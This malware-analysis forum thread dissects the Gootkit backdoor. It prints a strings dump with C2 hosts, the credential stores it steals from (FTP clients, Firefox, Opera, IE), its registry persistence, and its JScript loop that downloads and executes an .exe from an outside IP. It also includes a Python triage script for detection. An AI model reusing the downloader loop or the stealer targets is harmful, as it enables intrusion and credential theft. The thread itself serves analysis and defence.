A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #1254  by EP_X0FF
 Tue Jun 08, 2010 2:36 pm
Russian origin (probably) backdoor trojan.

Dropper VT result

http://www.virustotal.com/analisis/08e8 ... 1276006713

Container with malicious payload dll inside.

Spawns svchost.exe copy with GootkitSSO (see below) component loaded as library.
Downloads additional component, stores it in %temp% directory and then executes from svchost.

Extracted executable VT result
http://www.virustotal.com/analisis/e8fc ... 1276006850
[quote]
Mutant
\\.\PrepetiumVirta
POST %s HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: %s
Accept: text/html
Connection: Keep-Alive
Content-Length: %d
Content-Type: multipart/form-data; boundary=%s
Content-Disposition: form-data; name="data"
----------XEqOcMUhJz1uu5ZoHVzpHt
**RetCode:
Gootkit ldr 4
GET
%d%d%d.exe
heathen.cc
v00d00.org
ru7noh8quoob8moh.com
taishous4nohshiy.com
oyah9eeshacei2ae.com
SYSTEM\
Randseed_1
Randseed_2
SYSTEM\
Randseed_1
Randseed_2
Software\Microsoft\Windows\CurrentVersion\Group Policy Objects
SetIEPolicy: break
http://www.vedomosti.ru/
Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\%s\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
[nothing]
@xh$\\?\globalroot\systemroot\system32\drivers\vitra.sys
\SystemRoot\System32\drivers\vitra.sys
BPSitelist
Port
Password
Login
SiteAddress
Site%d
NumEntries
Main
Software\BPFTP\Bullet Proof FTP\
Software\BPFTP
InstallDir1
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP\Bullet Proof FTP\Options
SitesDir
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Main
LastSessionFile
robert249fsd)af8.?sf2eaya;sd$%85034gsn%@#!afsgsjdg;iawe;otigkbarr
Hostname
Username
Software\CoffeeCup Software\Internet\Profiles
hdfzpysvpzimorhk
User
Host
Software\FTPWare\COREFTP\Sites
CryptUnprotectData
crypt32.dll
smdata.dat
tree.dat
sm.dat
\GlobalSCAPE\CuteFTP Pro\
\GlobalSCAPE\CuteFTP\
SOFTWARE\Microsoft\Windows\ShellNoRoam\MUICache
cuteftppro.exe
cutftp32.exe
HostName
Software\Far\SavedDialogHistory\FTPHost
Software\Far\Plugins\FTP\Hosts
HostAdrs
UserName
Software\Sota\FFFTP\Options
Pass
Server
Servers
FileZilla3
\FileZilla\sitemanager.xml
yA36zA48dEhfrvghGRg57h5UlDv3
\History.dat
\Quick.dat
\Sites.dat
DataFolder
Software\FlashFXP\3
Install Path
Software\FlashFXP
path
\FlashFXP\3
Item
Ftp
\Frigate3\FtpSite.XML
FTP Commander Deluxe
FTP Commander
FTP Navigator
FTP Commander Pro
anonymous
ftplist.txt
UninstallString
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
Software\FTP Explorer\Profiles
v00d00.org/put_accs.dll
\FTPRush\RushSite.xml
rh$M
rh$D
rh$B
rh$Val
rh$ForceRemove
sh$NoRemove
sh$Delete
sh$AppID
CLSID
Component Categories
FileType
Interface
Hardware
Mime
SAM
SECURITY
SYSTEM
Software
TypeLib
\signons3.txt
\signons2.txt
\signons.txt
Install Directory
\Main
Software\Mozilla\Mozilla Firefox
Path
Profile0
IsRelative
profiles.ini
\Mozilla\Firefox\
SECITEM_FreeItem
PK11_FreeSlot
NSS_Shutdown
PK11SDR_Decrypt
PK11_Authenticate
PK11_GetInternalKeySlot
NSSBase64_DecodeBuffer
NSS_Init
nss3.dll
softokn3.dll
plds4.dll
plc4.dll
nspr4.dll
http
Log profile
\Opera
\profile\wand.dat
Software\Opera Software
Last Directory3
kDPAPI: 
MS IE FTP Passwords
WininetCacheCredentials
https://
http://
ftp://
:StringData
internet explorer
PStoreCreateInstance
pstorec.dll
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
abe2869f-9b47-4cd9-a358-c22904dba7f7
D:"Transfer Port"
S:"Password"
S:"Username"
S:"Hostname"
\Sessions
Software\VanDyke\SecureFX
Config Path
\VanDyke\Config\Sessions
FavoriteItem
\SmartFTP\Client 2.0\Favorites
#text
InstallDir
Software\Ghisler\Total Commander
Software\Ghisler\Windows Commander
password
username
host
connections
\wcx_ftp.ini
[/quote]

and more strings.

Sets the dll in the registry with the help of the [b]HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad[/b] key as [b]GootkitSSO[/b].

[url]http://www.virustotal.com/analisis/7b4fa216a467b10159cd08fe7bcc6a8a00990fd08204de01a1ff2838c60d8ae0-1276007178[/url]

Dll also contains a few strings.

Gtk1 process keeps connection with 

78.140.15.82:1863 and 443 (https)
27.152.135.79:3129 (which belongs to IP addresses affiliated with the control panel of the [b]Eleonore Exploits[/b] pack)

Named Gootkit because of numerous strings inside and mutex [quote]\BaseNamedObjects\gootkit[/quote]

Produces debug output (after reboot)
[quote]Script Entry() 
start thread for 'hxxp://78.140.15.82/quu3aiVai7Lei6epha7azoYegah4da9za2rec8ahngoosu7tuneemoizee5vael5eBoazahHephaahohTa3eecoochaiseesheichoh7aikuz0uas8zeekiaChiayeVa/scripts/thread1.script'
thread1 Entry()[/quote]

Script below
[quote]//#JScript
PrintValue("thread1 Entry()");
//**********************************************************************
//  BASIC Variables,
//  Do not remove.
//**********************************************************************
var FILE_ATTRIBUTE_DIRECTORY=0x00000010,
	FILE_ATTRIBUTE_READONLY=0x00000001,  
	FILE_ATTRIBUTE_HIDDEN=0x00000002,
	FILE_ATTRIBUTE_SYSTEM=0x00000004,  
	FILE_ATTRIBUTE_DIRECTORY=0x00000010,  
	FILE_ATTRIBUTE_ARCHIVE=0x00000020,  
	FILE_ATTRIBUTE_DEVICE=0x00000040,  
	FILE_ATTRIBUTE_NORMAL=0x00000080,  
	FILE_ATTRIBUTE_TEMPORARY=0x00000100,  
	FILE_ATTRIBUTE_SPARSE_FILE=0x00000200,  
	FILE_ATTRIBUTE_REPARSE_POINT=0x00000400,  
	FILE_ATTRIBUTE_COMPRESSED=0x00000800,  
	FILE_ATTRIBUTE_OFFLINE=0x00001000,  
	FILE_ATTRIBUTE_NOT_CONTENT_INDEXED=0x00002000,  
	FILE_ATTRIBUTE_ENCRYPTED=0x00004000,  
	FILE_ATTRIBUTE_VIRTUAL=0x00010000;  

var RESUME_PROCESS_THREADS = 1,
    SUSPEND_PROCESS_THREADS = 0;

var DEBUG_PRIVELEGES_ENABLED = 1,
    DEBUG_PRIVELEGES_DISABLED = 0;

var IE_WAIT_FOR_PAGE = 1,
    IE__DONT_WAIT_FOR_PAGE = 0;

var IPPROTO_IP = 0,
    IPPROTO_ICMP = 1,
    IPPROTO_TCP = 6,
    IPPROTO_PUP = 12,
    IPPROTO_UDP = 17,
    IPPROTO_IDP = 22,
    IPPROTO_ND = 77;

var HKEY_CLASSES_ROOT = 0,
    HKEY_CURRENT_USER = 1,
    HKEY_LOCAL_MACHINE = 2,
    HKEY_USERS = 3,
    HKEY_PERFORMANCE_DATA = 4,
    HKEY_PERFORMANCE_TEXT = 5,
    HKEY_PERFORMANCE_NLSTEXT = 6,
    HKEY_CURRENT_CONFIG = 7,
    HKEY_DYN_DATA = 8,
    HKEY_CURRENT_USER_LOCAL_SETTINGS = 9;

var REG_SZ = 1,
    REG_EXPAND_SZ = 2,
    REG_DWORD = 4,
    REG_DWORD_BIG_ENDIAN = 5;

var WAIT_INFINITI = -1;
var OpenFileForReading = 1, OpenFileForWriting = 2, OpenFileForAppending = 8;
var TristateUseDefault = -2, TristateTrue = -1, TristateFalse = 0;

//**********************************************************************
//  BASIC Functions,
//  Do not remove.
//**********************************************************************
function isInt(x) {
    var y=parseInt(x);
    if (isNaN(y)) return false;
    return x==y && x.toString()==y.toString();
}

function strpos( haystack, needle, offset) {
   if(offset) offset = offset ; 
   else offset = 0 ; 
   return haystack.indexOf(needle, offset); 
}

function stristr (haystack, needle, bool) {
    var pos = 0;
 
    haystack += '';
    pos = haystack.toLowerCase().indexOf( (needle+'').toLowerCase() );
    if (pos == -1){
        return false;
    } else{
        if (bool) {
            return haystack.substr( 0, pos );
        } else{
            return haystack.slice( pos );
        }
    }
}

function ProcessCreatedCallback(pid, path, cmdline, waitorno){
}

while(true){
	var tempfile = wapi_GetTempFileName();

	var xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
	
	xmlhttp.open("GET", "hxxp://78.140.15.82/protod.exe", false);
	xmlhttp.send();
	
	if(xmlhttp.status == 200){
		var stream = new ActiveXObject("ADODB.Stream");
		stream.Type = 1;
		stream.Open();
		stream.Write(xmlhttp.responseBody);
		stream.Flush();
		stream.Position = 0;
		stream.SaveToFile(tempfile, 2);
		stream.Close();
		delete stream;
		calcpid = papi_ExecCommandLine(tempfile, "", IE_WAIT_FOR_PAGE, "ProcessCreatedCallback");
	}
	
	delete xmlhttp;
	wapi_Sleep(5000);
}

PrintValue("thread1 End()");[/quote]

Protod.exe attached in gtk1.rar
Attachments
pass: malware
(17.42 KiB) Downloaded 97 times
pass: malware
(49.64 KiB) Downloaded 103 times
pass: malware
(89.67 KiB) Downloaded 112 times
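The strings dump, the persistence key and the download-and-execute loop in the post above give enough fixed indicators for a quick triage script. The following Python is an added example and is not code from the thread or from the malware: it scans a strings dump (or a dropped script) for the indicators EP_X0FF lists (the values are the post's, the grouping into categories is mine), flags a sample that references several FTP/browser credential stores as a stealer, and recognises the XMLHTTP + ADODB.Stream + SaveToFile download loop as seen in thread1.script. The sample input at the bottom is constructed for the demonstration.

```python
"""Triage helper for the Gootkit indicators posted in this thread (added example)."""
import re
from collections import defaultdict

# Indicators copied from the strings dumps in this thread; the category names are mine.
GOOTKIT_INDICATORS = {
    "c2_domain": ["heathen.cc", "v00d00.org", "ru7noh8quoob8moh.com",
                  "taishous4nohshiy.com", "oyah9eeshacei2ae.com"],
    "c2_ip": ["78.140.15.82", "27.152.135.79"],
    "mutex": ["PrepetiumVirta", "\\BaseNamedObjects\\gootkit"],
    "driver": ["drivers\\vitra.sys", "rk.sys"],
    "persistence": ["ShellServiceObjectDelayLoad", "GootkitSSO"],
    "http_boundary": ["----------XEqOcMUhJz1uu5ZoHVzpHt"],
    "banner": ["Gootkit ldr", "Gootkit v2.1"],
    # Credential stores the stealer component enumerates (FTP clients, Firefox, Opera, IE).
    "credential_store": ["sitemanager.xml", "wand.dat", "signons", "IntelliForms\\Storage2",
                         "wcx_ftp.ini", "CryptUnprotectData", "PK11SDR_Decrypt",
                         "PStoreCreateInstance"],
}

# Markers of the download-and-execute loop in the posted thread1.script, plus a
# URL ending in .exe (defanged hxxp:// is accepted as well as http://).
DOWNLOADER_MARKERS = ("msxml2.xmlhttp", "adodb.stream", "savetofile")
EXE_URL = re.compile(r"h(?:xx|tt)ps?://[^\s\"']+\.exe", re.IGNORECASE)

# Categories whose presence alone is enough to attribute the sample.
STRONG_CATEGORIES = {"c2_domain", "c2_ip", "mutex", "driver", "http_boundary", "banner"}


def scan_strings(lines):
    """Return {category: sorted list of matched indicators} for a list of strings."""
    hits = defaultdict(set)
    for line in lines:
        low = line.lower()
        for category, iocs in GOOTKIT_INDICATORS.items():
            for ioc in iocs:
                if ioc.lower() in low:          # substring match, case-insensitive
                    hits[category].add(ioc)
    return {category: sorted(found) for category, found in hits.items()}


def looks_like_downloader(script_text):
    """True when the text fetches an .exe over XMLHTTP and writes it with ADODB.Stream."""
    low = script_text.lower()
    return all(marker in low for marker in DOWNLOADER_MARKERS) \
        and EXE_URL.search(script_text) is not None


def triage(lines):
    """Combine the checks into one verdict dict for a strings dump or script."""
    hits = scan_strings(lines)
    return {
        "verdict": "gootkit" if STRONG_CATEGORIES.intersection(hits) else "unknown",
        "stealer": len(hits.get("credential_store", [])) >= 2,
        "downloader": looks_like_downloader("\n".join(lines)),
        "hits": hits,
    }


# Constructed sample, modelled on the strings dump in the post (not a real extraction).
SAMPLE_STRINGS = [
    "Mutant",
    "\\\\.\\PrepetiumVirta",
    "Content-Type: multipart/form-data; boundary=%s",
    "----------XEqOcMUhJz1uu5ZoHVzpHt",
    "Gootkit ldr 4",
    "v00d00.org",
    "\\SystemRoot\\System32\\drivers\\vitra.sys",
    "\\FileZilla\\sitemanager.xml",
    "\\profile\\wand.dat",
    "CryptUnprotectData",
    "kernel32.dll",
]

# Constructed excerpt in the shape of the posted thread1.script loop.
SAMPLE_SCRIPT = '''var xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
xmlhttp.open("GET", "hxxp://78.140.15.82/protod.exe", false);
var stream = new ActiveXObject("ADODB.Stream");
stream.SaveToFile(tempfile, 2);
'''

if __name__ == "__main__":
    for name, data in (("strings dump", SAMPLE_STRINGS), ("script", SAMPLE_SCRIPT.splitlines())):
        result = triage(data)
        print(f"{name}: verdict={result['verdict']} stealer={result['stealer']} "
              f"downloader={result['downloader']}")
        for category, found in sorted(result["hits"].items()):
            print(f"  {category}: {', '.join(found)}")
```

The indicator list is deliberately plain substring matching so it can be run over the output of `strings` on a suspect binary, a carved TCP stream or a dropped script without any parsing; a real deployment would keep the same categories but feed them from a signature file rather than a hard-coded dict.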
 #1302  by NOP
 Sun Jun 20, 2010 11:15 am
Gootkit v2.1

SYS(packed) strings:
Gootkit v2.1
Fuck you, dumper :\
\SystemRoot\system32\kernel32.dll
\SystemRoot\system32\ntdll.dll
rk.sys
DllEntryPoint
Attachments
Password: infected
(236.62 KiB) Downloaded 110 times
 #1358  by Evilcry
 Tue Jun 29, 2010 7:20 am
Hi,

Due to the heavy number of screenshots, I attach the direct link to Backdoor Gootkit Reverse Engineering of Dropper - KMode Driver and Network Analysis #1

http://evilcodecave.blogspot.com/2010/0 ... ng-of.html

Soon I'll publish the Second Episode; in attachment is the malicious dll carved out from the TCP stream.


Have a nice Day,
Giuseppe 'Evilcry' Bonfa
Attachments
Pwd: malware
(76.77 KiB) Downloaded 93 times